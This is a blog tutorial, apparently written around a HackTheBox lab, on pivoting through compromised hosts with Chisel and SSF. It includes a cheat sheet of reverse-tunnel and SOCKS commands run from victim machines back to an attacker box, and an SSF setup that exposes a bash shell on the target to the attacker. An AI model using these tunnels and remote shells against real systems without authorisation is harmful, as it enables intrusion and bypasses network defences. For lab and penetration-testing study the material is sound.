# Tunneling with Chisel and SSF

[hackthebox](/tags#hackthebox ) [tunnel](/tags#tunnel ) [chisel](/tags#chisel
) [ssf](/tags#ssf ) [htb-reddish](/tags#htb-reddish )  
  
Aug 10, 2020

Tunneling with Chisel and SSF

![](https://0xdfimages.gitlab.io/img/pipes-cover.png)

[Update 2020-08-10] Chisel now has a built in SOCKS proxy! I also added a
cheat sheet since I reference this post too often. [Original] Having just
[written up HTB Reddish](/2019/01/26/htb-reddish.html), pivoting without SSH
was at the top of my mind, and I’ve since learned of two programs that enable
pivots, Chisel and Secure Socket Funneling (SSF). I learned about Chisel from
Ippsec, and you can see [his using it to solve Reddish in his
video](https://www.youtube.com/watch?v=Yp4oxoQIBAM&t=1469s). I wanted to play
with it, and figured I’d document what I learned here. I learned about SSF
from another HTB user,
[jkr](https://www.hackthebox.eu/home/users/profile/77141), who not only
introduced me to SSF, but pulled together the examples in this post.

## Chisel

### TD;DR Cheat Sheet

Typical use. Examples assume Kali or other attack box is 10.10.14.3, client is
running from 10.10.10.10.

Start server listening on 8000:

`./chisel server -p 8000 --reverse`

From victim:

Command | Notes  
---|---  
`chisel client 10.10.14.3:8000 R:80:127.0.0.1:80` | Listen on Kali 80, forward to localhost port 80 on client  
`chisel client 10.10.14.3:8000 R:4444:10.10.10.240:80` | Listen on Kali 4444, forward to 10.10.10.240 port 80  
`chisel client 10.10.14.3:8000 R:socks` | Create SOCKS5 listener on 1080 on Kali, proxy through client  
  
### Background

Chisel’s author describes it as:

> Chisel is a fast TCP tunnel, transported over HTTP, secured via SSH. Single
> executable including both client and server. Written in Go (golang). Chisel
> is mainly useful for passing through firewalls, though it can also be used
> to provide a secure endpoint into your network. Chisel is very similar to
> crowbar though achieves much higher performance.

What that means for me is that I can run a server on my kali box, and then
connect to it from target boxes. On making that connection, I can define
different kinds of tunnels I want to set up.

### Prep

I’ll clone Chisel from [its GitHub page](https://github.com/jpillora/chisel):

    
    
    root@kali:/opt# git clone https://github.com/jpillora/chisel.git
    Cloning into 'chisel'...
    remote: Enumerating objects: 33, done.
    remote: Counting objects: 100% (33/33), done.
    remote: Compressing objects: 100% (27/27), done.
    remote: Total 1151 (delta 7), reused 18 (delta 5), pack-reused 1118
    Receiving objects: 100% (1151/1151), 3.31 MiB | 19.03 MiB/s, done.
    Resolving deltas: 100% (416/416), done.
    

Now, inside the chisel directory, I’ll run `go build`. It may download some
additional bits, and when complete, I’ll have a chisel binary:

    
    
    root@kali:/opt/chisel# ls -lh chisel 
    -rwxr-xr-x 1 root root 10M Jan 27 06:47 chisel
    

Ippsec points out that this is 10MB, which is a large file to be moving to
target in some environments. He shows how you can run `go build -ldflags="-s
-w"` and reduce it to 7.5MB (where `-s` is “Omit all symbol information from
the output file” or strip, and `-w` is “Omit the DWARF symbol table”). He also
shows how to `upx` pack it down to 2.9MB if bandwidth is tight.

### Server

First I’ll set up the server on my local box. The `chisel` binary I built acts
as both the client and the server, and if I run `./chisel --help`, I’ll see
that:

    
    
    root@kali:/opt/chisel# ./chisel --help
    
      Usage: chisel [command] [--help]
    
      Version: 0.0.0-src
    
      Commands:
        server - runs chisel in server mode
        client - runs chisel in client mode
    
      Read more:
        https://github.com/jpillora/chisel
    

So to start the server, I’ll run `./chisel server -p [port] --reverse`. `-p`
will allow me to specify what port `chisel` listens on. If I don’t proivde
this, it’ll try 8080 by default, which often fails since I almost always have
Burp running on 8080. `--reverse` tells the server that I want clients
connecting in to be allowed to define reverse tunnels. This means clients
connecting in can open listening ports on my kali box. That is what I want
here, but be aware of what you’re allowed it to do.

There are other options I may want to add as well:

  * `--host` allows me to define which interface to listen on, with all of them (0.0.0.0) being the default.
  * `--key` allows me to generate a key pair used for the connection. This buys some security, but then again, the key will have to be sitting on the target box connecting back, so anyone who grabs it will be able to connect.
  * `--authfile` and `--auth` allow me to specify user names and password necessary to connect.
  * `-v` turns on verbose logging to the terminal.

### Client

I’ll move a copy of chisel to target, and run it as `./chisel client [server
ip]:[server port] [remote string] [optional more remote strings]`.

Running this will connect to the server given, and create a tunnel for each
give remote string.

Remote strings take the format of `<local-host>:<local-port>:<remote-
host>:<remote-port>` as defined by `chisel`. I think it’s more intuitive to
think of it as `<listen-host>:<listen-port>:<forward-host>:<forward-port>`,
but I’ll use the names `chisel` uses in this post.

Of the four items, only the remote port is required. If no `local-host` is
given, it will assume 0.0.0.0 on the client. If no `local-port` is give, it
will default to the same as the `remote-port`. If no `remote-host` is given,
it will default to the server. You can give it `R` for `local-host` to
indicate that you want to listen on the remote host (ie, open the listener on
the server). In that case, the tunnel will go in the reverse direction.

### Examples

#### Basic Client Listener

A silly example that illustrats listening on the client. I am on a target that
can’t connect to the internet, but can route to my attacking machine. I’ll use
`chisel` to create a tunnel to the site I want to download from as follows:

  * `./chisel server -p 8000` on my attacker box.
  * `./chisel client 1.1.1.1:8000 9001:www.exploit-db.com:443` on the compromised box. This will connect back to my box, and start a listener on the target box. Any traffic sent to that listening port will be tunneled to my box, and then routed to www.exploit-db.com.
  * I can then use `wget` or `curl` to connect to `127.0.0.1:9001` and get things from the site. Depending on how the site is configured, I may have to turn off certificate checking, and/or modify the headers (such as Host) to get it to connect.

![](https://0xdfimages.gitlab.io/img/chisel-1.png)

#### Basic Server Listener

A more interesting example is one like I faced in Reddish. I exploited a
webapp, and needed to pivot into the network behind it. Since I was in a
container, only the webapp port (in this case 1880) was forwarded through to
the container, so I couldn’t just listen on another port.

In this case, I’ll use a reverse tunnel to open a listening port on my Kali
host that can now talk to hosts behind my initial compromised host:

  * `./chisel server -p 8000 --reverse` on my local box.
  * `./chisel client 1.1.1.1:8000 R:80:3.3.3.4:80` on the target. This will open a listener on port 80 on my Kali box, and any connections to that port will be forwarded to the target, which will pass them to port 80 on 3.3.3.4.

![](https://0xdfimages.gitlab.io/img/chisel-2.png)

#### Socks Proxy

_Update 10 Aug 2020_ : As of [version
1.5.0](https://github.com/jpillora/chisel/releases/tag/v1.5.0), Chisel now has
a Socks option built in.

On Kali run `./clisel server -p 8000 --reverse`.

On box you want to proxy through run `./chisel client 1.1.1.1:8000 R:socks`.

This will start a listener on Kali on port 1080 which is a SOCKS5 proxy
through the Chisel client.

_Original Text:_

Ippsec showed this at the end of his video, and it’s worth seeing. `chisel`
only let’s the server act as a socks proxy. But, in the case of Reddish, I
don’t have a way to connect directly to that server. I’ll use `chisel` to set
up a tunnel so I can connect to another `chisel` in the opposite direction:

  * `./chisel server -p 8000 --reverse` on local box, as usual.
  * `./chisel client 1.1.1.1:8000 R:8001:127.0.0.1:9001` on target box. Now anything I send to localhost:8001 on kali will forward to localhost:9001 on target.
  * `./chisel server -p 9001 --socks5` on target. Now I have a `chisel` server listening on 9001, in socks mode, and a way to get traffic to that port.
  * `./chisel client localhost:8001 socks` on Kali box. This connection is forwarded through the first tunnel and connects to the `chisel` server running on the box. Now my local host is listening on port 1080 (default, can change that with arguments) and will send traffic to target, and then proxy it outbound.

![](https://0xdfimages.gitlab.io/img/chisel-3.png)

Now I can use `proxychains` or `FoxyProxy` to interact with the network behind
the target natually.

#### More Complex Examples

At this point, these tunnels can be used to create more complex setups. For
example, to go even more layers deep into a network, I can set up listeners on
the first hop that forward back to the `chisel` server on kali, and then
create new `chisel` reverse tunnels from there.

## SSF

### Prep

SSF is using an SSL encrypted communication channel and therefore I will need
certificates and keys. The easy way is to checkout the [GitHub
repository](https://github.com/securesocketfunneling/ssf) and use the included
`certs` subdirectory. Also I will use the pre-compiled binaries provided and
downloadable under Releases in GitHub.

The client directory will look like:

    
    
    $ find .
    .
    ./ssf
    ./certs
    ./certs/trusted
    ./certs/trusted/ca.crt
    ./certs/server.key
    ./certs/dh4096.pem
    ./certs/certificate.crt
    ./certs/private.key
    ./certs/server.crt
    

I’ll also demonstrate the shell option, which is not on by default. To do so,
I will create following `config.json` in the same directory:

    
    
    {
      "ssf": {
        "services": {
          "datagram_forwarder": { "enable": true },
          "datagram_listener": { "enable": true, "gateway_ports": false },
          "stream_forwarder": { "enable": true }, "stream_listener": { "enable": true, "gateway_ports": false },
          "copy": { "enable": false },
          "shell": { "enable": true, "path": "/bin/bash", "args": "" },
          "socks": { "enable": true }
        }
      }
    }
    

The whole directory needs to be uploaded to target machine.

### Server

On my Kali machine I’ll start the SSF daemon:

    
    
    $ ./ssfd
    [2019-01-23T21:05:23+01:00] [info] [config] [tls] CA cert path: <file: ./certs/trusted/ca.crt>
    [2019-01-23T21:05:23+01:00] [info] [config] [tls] cert path: <file: ./certs/certificate.crt>
    [2019-01-23T21:05:23+01:00] [info] [config] [tls] key path: <file: ./certs/private.key>
    [2019-01-23T21:05:23+01:00] [info] [config] [tls] key password: <>
    [2019-01-23T21:05:23+01:00] [info] [config] [tls] dh path: <file: ./certs/dh4096.pem>
    [2019-01-23T21:05:23+01:00] [info] [config] [tls] cipher suite: <DHE-RSA-AES256-GCM-SHA384>
    [2019-01-23T21:05:23+01:00] [info] [config] [http proxy] <None>
    [2019-01-23T21:05:23+01:00] [info] [config] [socks proxy] <None>
    [2019-01-23T21:05:23+01:00] [info] [config] [circuit] <None>
    [2019-01-23T21:05:23+01:00] [info] [ssfd] listening on <*:8011>
    [2019-01-23T21:05:23+01:00] [info] [ssfd] running (Ctrl + C to stop)
    

Now the server is running on port 8011, which is the default port. I can
change the port with the `-p [port]` option.

### Client

On target host I will start the client, telling it to connect back to my box.
I’ll use the following options:

  * `-g` \- allow gateway ports. This allows client to bind local sockets to address besides localhost.
  * `-F 1080` \- This runs a socks proxy on the server on port 1080.
  * `-Y 1111` \- This opens local port 1111 as a shell on the client.
  * `-L 172.19.0.4:2222:10.10.14.3:2222` and `-L 172.19.0.4:3333:10.10.14.3:3333` \- These will open listeners on the target machine that will forwards back to my attacker box. This will come in handy when I want to exploit further machines that can’t talk to my attacker box directly.

    
    
    # ./ssf -g -F 1080 -Y 1111 -L 172.19.0.4:2222:10.10.14.3:2222 -L 172.19.0.4:3333:10.10.14.3:3333 10.10.14.3
    [2019-01-23T20:04:34+00:00] [info] [config] loading file <config.json>
    [2019-01-23T20:04:34+00:00] [info] [config] [tls] CA cert path: <file: ./certs/trusted/ca.crt>
    [2019-01-23T20:04:34+00:00] [info] [config] [tls] cert path: <file: ./certs/certificate.crt>
    [2019-01-23T20:04:34+00:00] [info] [config] [tls] key path: <file: ./certs/private.key>
    [2019-01-23T20:04:34+00:00] [info] [config] [tls] key password: <>
    [2019-01-23T20:04:34+00:00] [info] [config] [tls] dh path: <file: ./certs/dh4096.pem>
    [2019-01-23T20:04:34+00:00] [info] [config] [tls] cipher suite: <DHE-RSA-AES256-GCM-SHA384>
    [2019-01-23T20:04:34+00:00] [info] [config] [http proxy] <None>
    [2019-01-23T20:04:34+00:00] [info] [config] [socks proxy] <None>
    [2019-01-23T20:04:34+00:00] [info] [config] [microservices][shell] path: </bin/bash>
    [2019-01-23T20:04:34+00:00] [info] [config] [circuit] <None>
    [2019-01-23T20:04:34+00:00] [info] [ssf] connecting to <10.10.14.3:8011>
    [2019-01-23T20:04:34+00:00] [info] [ssf] running (Ctrl + C to stop)
    [2019-01-23T20:04:34+00:00] [info] [client] connection attempt 1/1
    [2019-01-23T20:04:34+00:00] [info] [client] connected to server
    [2019-01-23T20:04:34+00:00] [info] [client] running
    [2019-01-23T20:04:35+00:00] [info] [microservice] [shell]: start server on fiber port 1111
    [2019-01-23T20:04:35+00:00] [info] [client] service <remote-shell> OK
    [2019-01-23T20:04:35+00:00] [info] [microservice] [socks]: start server on fiber port 1080
    [2019-01-23T20:04:35+00:00] [info] [client] service <remote-socks> OK
    [2019-01-23T20:04:35+00:00] [info] [microservice] [stream_listener]: forward TCP connections from <172.19.0.4:2222> to 2222
    [2019-01-23T20:04:35+00:00] [info] [client] service <tcp-forward> OK
    [2019-01-23T20:04:35+00:00] [info] [microservice] [stream_listener]: forward TCP connections from <172.19.0.4:3333> to 3333
    [2019-01-23T20:04:35+00:00] [info] [client] service <tcp-forward> OK
    

I now have following setup:

  * Listening socket on `kali:1080` that is providing a SOCKS proxy to the network behind the target.
  * Listening socket on `kali:1111` that is providing a shell to the target.
  * Tunnels from target box back to local sockets for future shells or file uploads.

## Summary

Both Chisel and SSF are neat frameworks that I can use to enable pivoting when
ssh and forward connections in-bound aren’t independently possible. These are
both tools I’ll keep in my tool box moving forward.

Thanks to [jkr](https://www.hackthebox.eu/home/users/profile/77141) for
putting together much of the notes and documentation for the SSF section.

[](/2020/08/10/tunneling-with-chisel-and-ssf-update.html)

